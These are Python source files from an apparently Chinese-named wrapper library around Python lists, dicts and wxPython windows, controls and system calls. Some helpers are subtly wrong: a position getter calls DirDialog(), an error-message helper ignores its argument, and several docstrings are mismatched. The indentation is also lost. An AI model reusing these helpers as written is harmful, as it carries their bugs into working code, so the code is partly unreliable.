'返回列表格式[(1,2),(2,3),(3,4)]'
return list(字典.items())
def 字典_取全部键(字典):
return list(字典.keys())
def 字典_取全部值(字典):
return list(字典.values())
def 字典_取出并删除最后键值(字典):
'删除字典中最后一个键跟值并以元组格式返回删除的键跟值'
return 字典.popitem()
def 字典_取值添加(字典, 键, 值=None):
'如果查找键不存在则返回设置的失值且为字典新建该键值'
return 字典.setdefault(键, 值)
def 列表_转字典(列表):
'将[(1,2),(3,4)]转换成{1:2,3:4}'
字典 = dict()
for x in 列表: 字典[x[0]] = x[1]
return 字典
def 列表_合并为字典(列表1, 列表2):
'传入两个列表转换成字典 [1,2],[8,9]==>{1:8,2:9}'
return dict(zip(列表1, 列表2))
def 列表_加入成员(列表, 值):
'成功返回True'
列表.append(值)
return True
def 列表_插入成员(列表, 位置, 值):
'成功返回True 在指定位置插入指定值'
列表.insert(位置, 值)
return True
def 列表_取出现次数(列表, 值):
'搜索时 True 会当成1 False 是0'
return 列表.count(值)
def 列表_合并列表(列表, 新列表):
'成功返回True 在列表后面追加新的列表或元组成员进去'
列表.extend(新列表)
return True
def 列表_查找成员位置(列表, 值):
return 列表.index(值)
def 列表_取值并删除(列表, 位置=None):
'取出列表的一个成员值 并删除该成员,默认最后一个,位置为0则为第一个'
if 位置 == None:
return 列表.pop()
else:
return 列表.pop(位置)
def 列表_删除指定值(列表, 值):
'成功返回True 删除列表中找到的第一个值'
列表.remove(值)
return True
def 列表_倒序排列(列表):
'成功返回True 把列表的成员顺序到过来排序'
列表.reverse()
return True
def 列表_大小排序(列表, 排序方式=False):
'成功返回True 排序的列表只能全为整数型的,排序方式True为从大到小,默认False从小到大'
列表.sort(reverse=排序方式)
return True
def 数组_按成员长度排序(数组):
'传入一个序列,根据成员的长度排序 长的在前面'
return sorted(数组, key=lambda i: len(i), reverse=True)
def 数组_按子成员大小排序(数组, 成员索引):
'处理数组内包含数组需要排序的'
return sorted(数组, key=lambda i: i[成员索引])
def 数组_取随机成员数组(数组, 数量):
'失败返回False,在指定数组内随机取出指定数量的成员组成新数组返回'
return random.sample(数组, 数量)
def 数组_取随机成员(数组):
'可以传入字符 元组 列表登录,随机取出一个值'
return random.choice(数组)
```
#### File: wxefun/component/ComboBox.py
```python
import wx
from .wxControl import *
class 组合框(wx.ComboBox, 公用方法):
pass
@组件_异常检测
def 取指定项目索引(self,项目文本,是否区分大小写=False):
return self.FindString(项目文本,是否区分大小写)
def 取项目数(self):
return self.GetCount()
def 取选中项索引(self):
return self.GetCurrentSelection()
def 取选中项索引2(self):
return self.GetSelection()
def 取选中范围(self):
return self.GetTextSelection()
@组件_异常检测
def 取指定项目文本(self,索引):
return self.GetString(索引)
def 取选中项文本(self):
return self.GetStringSelection()
def 列表项是否为空(self):
return self.IsListEmpty()
def 弹出列表(self):
self.Popup()
@组件_异常检测
def 置指定项目文本(self,索引,文本):
self.SetString(索引,文本)
@组件_异常检测
def 置默认文本(self,文本):
self.SetValue(文本)
@组件_异常检测
def 置选中项(self,索引):
self.SetSelection(索引)
@组件_异常检测
def 置选中项_文本(self,项目文本):
return self.SetStringSelection(项目文本)
@组件_异常检测
def 选中范围文本(self,开始位置,结束位置):
'如果两个参数都等于-1,则选择控件中的所有文本'
self.SetTextSelection(开始位置,结束位置)
def 清空表项(self):
self.Clear()
@组件_异常检测
def 置项目列表(self,项目列表):
'会覆盖原有的项目列表'
self.SetItems(项目列表)
@组件_异常检测
def 加入项目(self,项目):
'支持单个或多个项目,多个项目使用列表传入,加入后会返回最后一个项目索引'
return self.Append(项目)
@组件_异常检测
def 加入项目2(self,项目):
'支持单个或多个项目,多个项目使用列表传入'
self.AppendItems(项目)
@组件_异常检测
def 删除指定项目(self,索引):
self.Delete(索引)
@组件_异常检测
def 插入项目(self,插入位置,项目列表):
return self.Insert(项目列表,插入位置)
```
#### File: pyefun/wxefun/func.py
```python
import datetime
import traceback
def 组件_异常检测(function):
'装饰器'
def box(*args, **kwargs):
try:
return function(*args, **kwargs)
except:
print(function.__name__, "函数发生异常")
print("错误发生时间:", str(datetime.datetime.now()))
print("错误的详细情况:", traceback.format_exc())
return box
@组件_异常检测
def 窗口_取窗口句柄(组件):
'取wxpython组件的窗口句柄'
return 组件.GetHandle()
@组件_异常检测
def 窗口_取组件祖组件(组件):
'取wxpython组件的上上层组件,[当前-父组件-祖组件]'
return 组件.GetGrandParent()
@组件_异常检测
def 窗口_对齐(组件,方向=12):
'默认居中,使组件在父组件内对齐,主窗口则在屏幕中间,1.左上 4/5.顶边 8/9.左边 12/13.居中'
return 组件.Center(方向)
@组件_异常检测
def 窗口_取桌面相对坐标(组件,x=0,y=0):
'返回相对于此组件的坐标转换为屏幕坐标,x,y为偏移位置,0为当前'
return 组件.ClientToScreen(x,y)
@组件_异常检测
def 窗口_关闭(窗口,关闭=True):
'用来关闭窗口'
return 窗口.Close(关闭)
@组件_异常检测
def 窗口_销毁(窗口):
'备注写的这个方法不会立即销毁窗口,会等事件执行后才安全的销毁'
return 窗口.Destroy()
@组件_异常检测
def 窗口_销毁所有子窗口(组件):
'销毁窗口下所有的子窗口,组件'
return 组件.DestroyChildren()
@组件_异常检测
def 窗口_销毁2(窗口):
'官方解释:计划在不久的将来销毁该窗口,每当销毁可能发生得太早时(例如,当该窗口或其子级仍在事件队列中等待时),都应使用此方法'
return 窗口.DestroyLater()
@组件_异常检测
def 窗口_禁用(组件):
'组件禁用后连同子级组件也无法点击移动'
return 组件.Disable()
@组件_异常检测
def 窗口_禁用2(组件):
'启用或禁用用于用户输入的窗口'
return 组件.Enable(False)
@组件_异常检测
def 窗口_允许拖放文件(组件,允许=True):
'允许接收拖放文件'
return 组件.DragAcceptFiles(允许)
@组件_异常检测
def 窗口_ID匹配组件(父窗口,id):
'在父窗口下查找返回该ID的组件'
return 父窗口.FindWindow(id)
@组件_异常检测
def 窗口_ID匹配组件2(父窗口,id):
'在父窗口下查找返回匹配到的第一个该ID的组件,可使用wx.FindWindowById全程序查找'
return 父窗口.FindWindowById(id)
@组件_异常检测
def 窗口_取键盘焦点组件(父窗口):
'在父窗口下查找当前具有键盘焦点的窗口或控件'
return 父窗口.FindFocus()
@组件_异常检测
def 窗口_标题匹配组件(父窗口,标题):
'通过组件标题查找返回匹配到的第一个组件,可使用wx.FindWindowByLabel全程序查找'
return 父窗口.FindWindowByLabel(标题)
@组件_异常检测
def 窗口_名称匹配组件(父窗口,组件名):
'通过组件标题查找返回匹配到的第一个组件,可使用wx.FindWindowByName全程序查找'
return 父窗口.FindWindowByName(组件名)
@组件_异常检测
def 窗口_自动调整尺寸(组件):
'调整窗口大小以适合其最佳大小。'
return 组件.Fit()
@组件_异常检测
def 窗口_自动调整内部尺寸(组件):
'与相似Fit,但是调整窗户的内部(虚拟)尺寸,主要用于滚动窗口,以在调整大小而不会触发大小事件的情况下重置滚动条,和/或不带内部大小调整器的滚动窗口。如果没有子窗口,此功能同样不会执行任何操作。'
return 组件.FitInside()
@组件_异常检测
def 窗口_禁止重画(组件):
'冻结窗口,换句话说,阻止任何更新在屏幕上发生,窗口根本不会重绘'
return 组件.Freeze()
@组件_异常检测
def 窗口_允许重画(组件):
'重新启用窗口更新'
return 组件.Thaw()
@组件_异常检测
def 窗口_取背景颜色(组件):
'返回窗口的背景色,格式:(240, 240, 240, 255)'
return 组件.GetBackgroundColour()
@组件_异常检测
def 窗口_取样式(组件):
'样式:0.默认背景样式值,1.使用由系统或当前主题确定的默认背景,2.指示仅在用户定义的EVT_PAINT处理程序中擦除背景,3.无介绍,4.表示未擦除窗口背景,从而使父窗口得以显示'
return 组件.GetBackgroundStyle()
@组件_异常检测
def 窗口_取最小可接受尺寸(组件):
'回窗口的最佳可接受最小尺寸,返回格式:(宽度,高度),高度不包含标题栏高度'
return 组件.GetBestSize()
@组件_异常检测
def 窗口_取最大可接受尺寸(组件):
'回窗口的最佳可接受最小尺寸,返回格式:(宽度,高度),高度不包含标题栏高度'
return 组件.GetBestVirtualSize()
@组件_异常检测
def 窗口_取边框样式(组件):
'获取此窗口的标志的边框'
return 组件.GetBorder()
@组件_异常检测
def 窗口_取额外样式(组件):
'窗口的额外样式位'
return 组件.GetExtraStyle()
@组件_异常检测
def 窗口_取字体高度(组件):
'返回此窗口的字符高度'
return 组件.GetCharHeight()
@组件_异常检测
def 窗口_取平均字符宽度(组件):
'返回此窗口的平均字符宽度'
return 组件.GetCharWidth()
@组件_异常检测
def 窗口_遍历下级组件(组件):
'遍历组件下的子级组件,返回在WindowList 列表里'
return 组件.GetChildren()
@组件_异常检测
def 窗口_取字体及颜色(组件):
'返回字体,背景颜色,前景颜色,#(<wx._core.Font object at 0x000002140997DB88>, wx.Colour(240, 240, 240, 255), wx.Colour(0, 0, 0, 255))'
结果 = 组件.GetClassDefaultAttributes()
return 结果.font,结果.colBg,结果.colFg
@组件_异常检测
def 窗口_取矩形(组件):
'返回窗口矩形:(左边,顶边,宽度,高度)'
return 组件.GetRect()
@组件_异常检测
def 窗口_取矩形2(组件):
'返回窗口矩形:(0,0,宽度,高度)'
return 组件.GetClientRect()
@组件_异常检测
def 窗口_取宽高(组件):
'返回窗口实际宽高:(宽度,高度)'
return 组件.GetClientSize()
@组件_异常检测
def 窗口_取宽高2(组件):
'将窗口的最佳大小合并为最小大小,然后返回结果,返回宽高:(宽度,高度)'
return 组件.GetEffectiveMinSize()
@组件_异常检测
def 窗口_取字体(组件):
'返回此窗口的字体'
return 组件.GetFont()
@组件_异常检测
def 窗口_取前景色(组件):
'返回窗口的前景色'
return 组件.GetForegroundColour()
@组件_异常检测
def 窗口_取标记ID(组件):
'返回窗口的标识符'
return 组件.GetId()
@组件_异常检测
def 窗口_取标题(组件):
'返回窗口的标题'
return 组件.GetLabel()
@组件_异常检测
def 窗口_置工作区宽高(组件,宽度,高度):
'设置组件工作区的宽高(不包含边框,标题栏的宽高)'
return 组件.SetClientSize(宽度,高度)
@组件_异常检测
def 窗口_取工作区最小宽高(组件):
'返回窗口的工作区的最小大小,这向sizer布局机制指示这是其工作区的最小所需大小'
return 组件.GetMinClientSize()
@组件_异常检测
def 窗口_取最小宽高(组件):
'返回窗口的最小大小,这向sizer布局机制指示这是最小所需大小'
return 组件.GetMinSize()
@组件_异常检测
def 窗口_取组件名称(组件):
'返回窗口的名称'
return 组件.GetName()
@组件_异常检测
def 窗口_取下一窗口(组件):
'返回此窗口之后的下一个窗口(同一级窗口里)'
return 组件.GetNextSibling()
@组件_异常检测
def 窗口_取上一窗口(组件):
'返回父级的子级中前一个的前一个窗口'
return 组件.GetPrevSibling()
@组件_异常检测
def 窗口_取父级窗口(组件):
'返回窗口的父级,或者返回没有父级的窗口None'
return 组件.GetParent()
@组件_异常检测
def 窗口_弹出菜单(组件,菜单,左边,顶边):
'此函数在此窗口中的给定位置显示一个弹出菜单,并返回所选的ID'
return 组件.GetPopupMenuSelectionFromUser(菜单,左边,顶边)
@组件_异常检测
def 窗口_取左边顶边(组件):
'这将获得相对于子窗口的父窗口或相对于顶级窗口的显示原点的窗口位置(以像素为单位),格式:(左边,顶边)'
return 组件.DirDialog()
@组件_异常检测
def 窗口_取窗口相对屏幕坐标(组件):
'返回窗口在屏幕坐标中的位置,无论该窗口是子窗口还是顶级窗口,格式:(相对于屏幕的左边,相对于屏幕的顶边)'
return 组件.GetScreenPosition()
@组件_异常检测
def 窗口_取窗口相对屏幕矩形(组件):
'返回窗口在屏幕坐标中的位置,无论该窗口是子窗口还是顶级窗口,格式:(相对于屏幕的左边,相对于屏幕的顶边,组件宽度,组件高度)'
return 组件.GetScreenRect()
@组件_异常检测
def 窗口_取内置滚动条位置(组件,方向):
'返回内置滚动条的位置,方向:4.横向滚动条 8.纵向滚动条'
return 组件.GetScrollPos(方向)
@组件_异常检测
def 窗口_取内置滚动条范围(组件,方向):
'返回内置滚动条范围,方向:4.横向滚动条 8.纵向滚动条'
return 组件.GetScrollRange(方向)
@组件_异常检测
def 窗口_取内置滚动条缩略图大小(组件,方向):
'返回内置滚动条的缩略图大小,方向:4.横向滚动条 8.纵向滚动条'
return 组件.GetScrollThumb(方向)
@组件_异常检测
def 窗口_置滚动条位置(组件,方向,位置,重绘):
'设置滚动条位置,方向可选4或8,重绘True或False(设置内置滚动条之一的位置)'
return 组件.SetScrollPos(方向,位置,重绘)
@组件_异常检测
def 窗口_置滚动条属性(组件,方向,位置,可见大小,最大位置,重绘):
'''
设置滚动条位置,方向可选4或8,重绘True或False(设置内置滚动条之一的位置)
假设您希望使用相同的字体显示50行文本。窗口的大小设置为一次只能看到16行。您将使用:
self.SetScrollbar(wx.VERTICAL, 0, 16, 50)
'''
return 组件.SetScrollbar(方向,位置,可见大小,最大位置,重绘)
@组件_异常检测
def 窗口_取完整窗口宽高(组件):
'返回整个窗口的大小(以像素为单位),包括标题栏,边框,滚动条等。如果此窗口是顶级窗口,并且当前已最小化,则返回的大小是还原的窗口大小,而不是窗口图标的大小'
return 组件.GetSize()
@组件_异常检测
def 窗口_是否使用系统主题设置背景(组件):
'窗口是否使用系统主题绘制其背景'
return 组件.GetThemeEnabled()
@组件_异常检测
def 窗口_取顶级窗口(组件):
'返回此窗口(顶级窗口)的第一个祖先'
return 组件.GetTopLevelParent()
@组件_异常检测
def 窗口_取虚拟宽高(组件):
'出错返回False,这将获取窗口的虚拟大小,它返回窗口的客户端大小,但是在调用SetVirtualSize 它之后,将返回使用该方法设置的大小'
return 组件.GetVirtualSize()
@组件_异常检测
def 窗口_是否有焦点(组件):
'窗口(或在复合控件的情况下,其主子窗口)是否具有焦点'
return 组件.HasFocus()
@组件_异常检测
def 窗口_是否有滚动条(组件,方向):
'返回此窗口当前是否具有该方向的滚动条,方向:4.横向滚动条 8.纵向滚动条'
return 组件.HasScrollbar(方向)
@组件_异常检测
def 窗口_是否透明(组件):
'返回此窗口背景是否透明(例如,对于 wx.StaticText),并应显示父窗口背景'
return 组件.HasTransparentBackground()
@组件_异常检测
def 窗口_隐藏(组件):
'此功能可隐藏一个窗口'
return 组件.Hide()
@组件_异常检测
def 窗口_隐藏带特效(组件,效果,效果时长):
'''
此功能可隐藏一个窗口并使用特殊的视觉效果
效果:0.无效果,1.向左滚动窗口,2.向右滚动窗口,3.将窗口滚动到顶部,4.将窗口滚动到底部,5.向左滑动窗口,6.向右滑动窗口,7.将窗口滑动到顶部,8.将窗口滑动到底部,9.淡入或淡出效果,10.扩大或崩溃的作用
效果时长:单位毫秒
'''
return 组件.HideWithEffect(效果,效果时长)
@组件_异常检测
def 窗口_显示带特效(组件,效果,效果时长):
'''
此功能可隐藏一个窗口并使用特殊的视觉效果
效果:0.无效果,1.向左滚动窗口,2.向右滚动窗口,3.将窗口滚动到顶部,4.将窗口滚动到底部,5.向左滑动窗口,6.向右滑动窗口,7.将窗口滑动到顶部,8.将窗口滑动到底部,9.淡入或淡出效果,10.扩大或崩溃的作用
效果时长:单位毫秒
'''
return 组件.ShowWithEffect(效果,效果时长)
@组件_异常检测
def 窗口_是否继承父级背景色(组件):
'如果此窗口从其父级继承背景色,则返回True'
return 组件.InheritsBackgroundColour()
@组件_异常检测
def 窗口_是否继承父级前景色(组件):
'如果此窗口从其父级继承前景色,则返回True'
return 组件.InheritsForegroundColour()
@组件_异常检测
def 窗口_重置缓存最佳大小(组件):
'重置缓存的最佳大小值,以便下次需要时重新计算'
return 组件.InvalidateBestSize()
@组件_异常检测
def 窗口_是否正在销毁(组件):
'此窗口是否正在销毁中'
return 组件.IsBeingDeleted()
@组件_异常检测
def 窗口_是否为下级窗口(组件,对比组件):
'检查指定的窗口是否是该窗口的后代,窗口是否为该窗口的后代(例如,子代或孙代或子孙或……)返回True'
return 组件.IsDescendant(对比组件)
@组件_异常检测
def 窗口_是否禁用(组件):
'是否启用了窗口,即是否接受用户输入'
return 组件.IsEnabled()
@组件_异常检测
def 窗口_是否可获取焦点(组件):
'判断窗口是否可以获取焦点'
return 组件.IsFocusable()
@组件_异常检测
def 窗口_是否禁止重画(组件):
'判断窗口是否可已经禁止重画'
return 组件.IsFrozen()
@组件_异常检测
def 窗口_是否始终显示滚动条(组件,方向):
'判断滚动条是否始终显示,方向:4.横向滚动条 8.纵向滚动条'
return 组件.IsScrollbarAlwaysShown(方向)
@组件_异常检测
def 窗口_是否隐藏(组件):
'判断是否调用命令隐藏了窗口,最小化,遮挡,不算隐藏'
return 组件.IsShown()
@组件_异常检测
def 窗口_是否显示在屏幕上(组件):
'判断是否调用命令隐藏了窗口,最小化,遮挡,不算隐藏'
return 组件.IsShownOnScreen()
@组件_异常检测
def 窗口_是否启用(组件):
'是否从本质上启用了此窗口,False否则返回'
return 组件.IsThisEnabled()
@组件_异常检测
def 窗口_是否为顶级窗口(组件):
'窗口是否为顶级窗口'
return 组件.IsTopLevel()
@组件_异常检测
def 窗口_向下滚动(组件):
'与ScrollLines (1)相同,返回True是否滚动窗口,False如果窗口已经在底部,则什么也不做'
return 组件.LineDown()
@组件_异常检测
def 窗口_向上滚动(组件):
'与ScrollLines (-1)相同,返回True是否滚动窗口,False如果窗口已经在顶部,则什么也不做'
return 组件.LineUp()
@组件_异常检测
def 窗口_滚动_页(组件,滚动页数=1):
'滚动页数:向上滚动1次为-1,向下为1'
return 组件.ScrollPages(滚动页数)
@组件_异常检测
def 窗口_滚动_行(组件,滚动行数=1):
'滚动行数:向上滚动1次为-1,向下为1'
return 组件.ScrollLines(滚动行数)
@组件_异常检测
def 窗口_移动左边顶边(组件,左边,顶边):
'调整移动窗口的左边跟顶边位置'
return 组件.Move(左边,顶边)
@组件_异常检测
def 窗口_移动左边顶边2(组件,左边,顶边):
'调整移动窗口的左边跟顶边位置'
return 组件.SetPosition((左边,顶边))
@组件_异常检测
def 窗口_移动(组件,左边=-1,顶边=-1,宽度=-1,高度=-1):
'调整移动窗口的左边跟顶边位置并重新设置宽度跟高度,不想调整的填-1'
return 组件.SetSize(左边,顶边,宽度,高度)
@组件_异常检测
def 窗口_设置切换顺序_上(组件,上一个组件):
'调整TAB切换的顺序,当上一个组件按TAB后焦点就会到当前组件上'
return 组件.MoveAfterInTabOrder(上一个组件)
@组件_异常检测
def 窗口_设置切换顺序_下(组件,下一个组件):
'调整TAB切换的顺序,当前组件按TAB后焦点会切换到下一个组件'
return 组件.MoveBeforeInTabOrder(下一个组件)
@组件_异常检测
def 窗口_生成组件ID(组件):
'创建一个新的ID或当前未使用的ID范围,格式:-31987'
return 组件.NewControlId()
@组件_异常检测
def 窗口_重绘指定区域(组件,矩形=(0,0,0,0),擦除背景=True):
'重绘指定矩形的内容:仅对其内部的区域进行重绘'
return 组件.RefreshRect(矩形,擦除背景)
@组件_异常检测
def 窗口_修改父级窗口(组件,新父级组件):
'即该窗口将从其当前父窗口中移除加入到新的父级窗口下'
return 组件.Reparent(新父级组件)
@组件_异常检测
def 窗口_桌面坐标转窗口内坐标(组件,x,y):
'从屏幕转换为客户端窗口内工作区坐标,'
return 组件.ScreenToClient(x,y)
@组件_异常检测
def 窗口_到最顶层(组件):
return 组件.Raise()
@组件_异常检测
def 窗口_到最底层(组件):
return 组件.Lower()
@组件_异常检测
def 窗口_是否已设置背景色(组件):
return 组件.UseBackgroundColour()
@组件_异常检测
def 窗口_是否已设置前景色(组件):
return 组件.UseForegroundColour()
@组件_异常检测
def 窗口_置背景颜色(组件,颜色):
return 组件.SetBackgroundColour(颜色)
@组件_异常检测
def 窗口_单独置背景颜色(组件,颜色):
'设置窗口的背景色,但防止其被该窗口的子级继承'
return 组件.SetOwnBackgroundColour(颜色)
@组件_异常检测
def 窗口_置前景颜色(组件,颜色):
return 组件.SetForegroundColour(颜色)
@组件_异常检测
def 窗口_单独置前景颜色(组件,颜色):
'设置窗口的前景色,但防止其被该窗口的子代继承'
return 组件.SetOwnForegroundColour(颜色)
@组件_异常检测
def 窗口_置标识ID(组件,ID):
return 组件.SetId(ID)
@组件_异常检测
def 窗口_置宽高(组件,宽度,高度):
return 组件.SetInitialSize((宽度,高度))
@组件_异常检测
def 窗口_置最大宽高(组件,宽度,高度):
'设置整个窗口最大尺寸范围'
return 组件.SetMaxSize((宽度,高度))
@组件_异常检测
def 窗口_置最小宽高(组件,宽度,高度):
'设置整个窗口最大尺寸范围'
return 组件.SetMinSize((宽度,高度))
@组件_异常检测
def 窗口_置工作区最大宽高(组件,宽度,高度):
'设置窗口的最大客户端大小(不包含标题栏菜单栏状态栏的尺寸),以向sizer布局机制指示这是其客户端区域的最大可能大小'
return 组件.SetMaxClientSize((宽度,高度))
@组件_异常检测
def 窗口_置工作区最小宽高(组件,宽度,高度):
'设置窗口的最大客户端大小(不包含标题栏菜单栏状态栏的尺寸),以向sizer布局机制指示这是其客户端区域的最大可能大小'
return 组件.SetMinClientSize((宽度,高度))
@组件_异常检测
def 窗口_置虚拟宽高(组件,宽度,高度):
'设置窗口的虚拟大小(以像素为单位)'
return 组件.SetVirtualSize((宽度,高度))
@组件_异常检测
def 窗口_置标题(组件,标题):
return 组件.SetLabel(标题)
@组件_异常检测
def 窗口_置名称(组件,名称):
return 组件.SetName(名称)
@组件_异常检测
def 窗口_是否允许透明(组件):
return 组件.CanSetTransparent()
@组件_异常检测
def 窗口_置透明度(组件,透明度):
'设置窗口与透明度,范围0-255(0.完全透明,255完全不透明)'
return 组件.SetTransparent(透明度)
@组件_异常检测
def 窗口_置主题样式(组件,样式):
'窗口样式:0.默认(可擦除背景),1.跟随系统主题,2.指示仅在用户定义的EVT_PAINT处理程序中擦除背景,3.表示未擦除窗口背景,从而使父窗口得以显示,4.无描述。'
return 组件.SetBackgroundStyle(样式)
@组件_异常检测
def 窗口_置窗口样式(组件,样式):
'样式:0.无边框,536870912.右上角无按钮,更多样式百度'
return 组件.SetWindowStyleFlag(样式)
@组件_异常检测
def 窗口_刷新重绘(组件,删除背景=False):
'导致GTK1重新绘制此窗口及其所有子级(除非未实现此子级)'
return 组件.Refresh(删除背景)
@组件_异常检测
def 窗口_刷新重绘2(组件):
'调用此方法将立即重新绘制窗口的无效区域及其所有子级的对象(通常仅在控制流返回事件循环时才发生)'
return 组件.Update()
@组件_异常检测
def 窗口_显示或隐藏(组件,是否显示=True):
'显示或隐藏窗口'
return 组件.Show(是否显示)
@组件_异常检测
def 窗口_移动鼠标(组件,x,y):
'将指针移动到窗口上的指定位置'
return 组件.WarpPointer(x,y)
@组件_异常检测
def 窗口_置鼠标光标样式(组件,样式):
'''样式:
0:无描述
1:标准箭头光标。
2:指向右侧的标准箭头光标。
3:靶心光标。
4:矩形字符光标。
5:十字光标。
6:手形光标。
7:工字梁光标(垂直线)。
8:表示鼠标左键按下。
9:放大镜图标。
10:表示按下中间按钮的鼠标。
11:不可输入的符号光标。
12:画笔光标。
13:铅笔光标。
14:指向左的光标。
15:指向右的光标。
16:箭头和问号。
17:表示按下了右键的鼠标。
18:调整大小的光标指向NE-SW。
19:调整大小的光标指向N-S。
20:调整大小的光标指向NW-SE。
21:调整大小的光标指向W-E。
22:一般大小的游标。
23:Spraycan游标。
24:等待光标。
25:监视光标。
26:透明光标。
27:带有标准箭头的等待光标。
28:无描述。
'''
return 组件.SetCursor(wx.Cursor(样式))
@组件_异常检测
def 窗口_设置字体(组件,字体名,大小,粗细,下划线):
'窗口样式:0.默认(可擦除背景),1.跟随系统主题,2.指示仅在用户定义的EVT_PAINT处理程序中擦除背景,3.表示未擦除窗口背景,从而使父窗口得以显示,4.无描述。'
return 组件.SetFont(wx.Font(大小,wx.DEFAULT, wx.NORMAL, 粗细, 下划线, 字体名))
@组件_异常检测
def 程序_取指定坐标处组件(x,y):
'传入桌面上坐标'
return wx.FindWindowAtPoint((x,y))
@组件_异常检测
def 程序_取鼠标处组件跟坐标():
'取当前鼠标下面的组件及坐标,返回格式:(组件,(x,y)),返回的坐标是相对于桌面的坐标'
return wx.FindWindowAtPointer()
@组件_异常检测
def 程序_取屏幕工作区矩形():
'取屏幕工作区矩形(不包含任务栏宽高),格式:(0,0,1920,1040) 任务栏占了40'
return wx.GetClientDisplayRect()
@组件_异常检测
def 程序_取屏幕分辨率():
'返回格式:(1920,1080)'
return wx.GetDisplaySize()
@组件_异常检测
def 程序_取屏幕尺寸():
'返回以毫米为单位的显示尺寸,格式:(508,286)'
return wx.GetDisplaySizeMM()
@组件_异常检测
def 程序_恢复默认鼠标光标():
'对于应用程序中的所有窗口,将光标更改回原始光标'
return wx.EndBusyCursor()
@组件_异常检测
def 程序_重置所有鼠标光标(光标类型):
'''将光标更改为应用程序中所有窗口的给定光标
光标类型:
0:无描述
1:标准箭头光标。
2:指向右侧的标准箭头光标。
3:靶心光标。
4:矩形字符光标。
5:十字光标。
6:手形光标。
7:工字梁光标(垂直线)。
8:表示鼠标左键按下。
9:放大镜图标。
10:表示按下中间按钮的鼠标。
11:不可输入的符号光标。
12:画笔光标。
13:铅笔光标。
14:指向左的光标。
15:指向右的光标。
16:箭头和问号。
17:表示按下了右键的鼠标。
18:调整大小的光标指向NE-SW。
19:调整大小的光标指向N-S。
20:调整大小的光标指向NW-SE。
21:调整大小的光标指向W-E。
22:一般大小的游标。
23:Spraycan游标。
24:等待光标。
25:监视光标。
26:透明光标。
27:带有标准箭头的等待光标。
28:无描述。
'''
return wx.BeginBusyCursor(wx.Cursor(光标类型))
@组件_异常检测
def 程序_关闭2():
"立即结束程序"
wx.Abort()
@组件_异常检测
def 程序_关闭():
"立即结束程序,会卡顿下"
wx.Exit()
@组件_异常检测
def 程序_系统错误代码转提示文本(code):
"返回与给定系统错误代码对应的错误消息,示例:code=3 返回:系统找不到指定的路径。"
return wx.SysErrorMsgStr(3)
@组件_异常检测
def 程序_电脑关机():
"立即结束程序,会卡顿下"
wx.Shutdown(2)
@组件_异常检测
def 程序_电脑重启():
"立即结束程序,会卡顿下"
wx.Shutdown(4)
@组件_异常检测
def 程序_延时_微秒(时间):
"延时单位(微秒)1秒=1000000微秒"
wx.MicroSleep(时间)
@组件_异常检测
def 程序_延时_毫秒(时间):
"延时单位(毫秒)1秒=1000毫秒"
wx.MilliSleep(时间)
@组件_异常检测
def 程序_延时_秒(时间):
wx.Sleep(时间)
@组件_异常检测
def 程序_取本地英文时间():
"返回时间示例:Sun Aug 16 15:57:41 2020"
return wx.Now()
@组件_异常检测
def 程序_取程序对象():
"返回当前应用程序对象"
return wx.GetApp()
@组件_异常检测
def 程序_取程序顶级窗口列表():
"返回应用程序顶级窗口的类似列表的对象(返回顶级窗口的对象列表)"
return wx.GetTopLevelWindows()
@组件_异常检测
def 程序_取计算机名():
"返回当前应用程序对象"
return wx.GetHostName()
@组件_异常检测
def 程序_取系统版本信息():
"返回示例: Windows 10 (build 18363),64位版"
return wx.GetOsDescription()
@组件_异常检测
def 程序_取系统用户名():
"返回示例: Administrator"
return wx.GetUserName()
@组件_异常检测
def 程序_系统是否64位():
"返回True程序运行所在的操作系统是否为64位。"
return wx.IsPlatform64Bit()
@组件_异常检测
def 程序_打开指定网址或目录(地址):
"可以打开电脑目录或使用默认浏览器打开指定网址"
return wx.LaunchDefaultBrowser(地址)
@组件_异常检测
def 程序_打开指定网址(url):
import webbrowser
return webbrowser.open(url)
@组件_异常检测
def 程序_取鼠标坐标():
"返回鼠标坐标(x,y)"
return wx.GetMouseState().GetPosition()
@组件_异常检测
def 程序_鼠标侧键1是否按下():
"返回当前应用程序对象,判断鼠标侧边附加的按键是否按下"
return wx.GetMouseState().Aux1IsDown()
@组件_异常检测
def 程序_鼠标侧键2是否按下():
"返回True或False,判断鼠标侧边附加的按键是否按下"
return wx.GetMouseState().Aux2IsDown()
@组件_异常检测
def 程序_鼠标左键是否按下():
"返回True或False,判断鼠标左键是否按下"
return wx.GetMouseState().LeftIsDown()
@组件_异常检测
def 程序_鼠标中键是否按下():
"返回True或False,判断鼠标中键是否按下"
return wx.GetMouseState().MiddleIsDown()
@组件_异常检测
def 程序_鼠标右键是否按下():
"返回True或False,判断鼠标右键是否按下"
return wx.GetMouseState().RightIsDown()
@组件_异常检测
def 程序_取当前进程ID():
"返回当前程序进程PID"
return wx.GetProcessId()
@组件_异常检测
def 程序_系统环境是否支持中文():
"返回True或False 更多环境语言方法参考:https://wxpython.org/Phoenix/docs/html/wx.Language.enumeration.html#wx-language"
return wx.GetLocale().IsAvailable(wx.LANGUAGE_CHINESE)
@组件_异常检测
def 程序_取环境语言名称():
"返回示例: Chinese (Simplified) 更多环境语言方法参考:https://wxpython.org/Phoenix/docs/html/wx.Locale.html#wx-locale"
return wx.GetLocale().GetLocale()
@组件_异常检测
def 程序_取环境语言缩写():
"返回实力: zh_CN 更多环境语言方法参考:https://wxpython.org/Phoenix/docs/html/wx.Locale.html#wx-locale"
return wx.GetLocale().GetName()
@组件_异常检测
def 程序_系统是否已激活():
"返回True或False,不太确定是不是这个命令,获取更多电脑描述信息参考:https://wxpython.org/Phoenix/docs/html/wx.VersionInfo.html#wx-versioninfo"
return wx.GetLibraryVersionInfo().HasCopyright()
@组件_异常检测
def 程序_执行Dos(命令):
'运行cmd内的命令,只返回True跟False'
return wx.Shell(命令)
@组件_异常检测
def 组件_信息框(提示="",标题="提示",类型=0,父窗口=None):
"""
类型:
0.无图标信息框
1.带取消键普通信息框
2.带是/否键普通信息框
3.带帮助键普通信息框
4.带红色错误图标信息框
5.带黄色感叹标题信息框
6.带盾牌(类似权限验证)图标信息框
返回值:2.是 4.确定 8.否 16.取消/关闭 4096.帮助
"""
字典 = {0:262144,1:16,2:10,3:4096,4:512,5:256,6:524288}
return wx.MessageBox(提示,标题,字典[类型],父窗口)
@组件_异常检测
def 组件_提示信息框(内容):
"弹出一个带蓝色反向感叹号图标的信息框"
return wx.LogMessage(内容)
@组件_异常检测
def 组件_警告信息框(内容):
"弹出一个带黄色三角形感叹号图标的信息框"
return wx.LogWarning(内容)
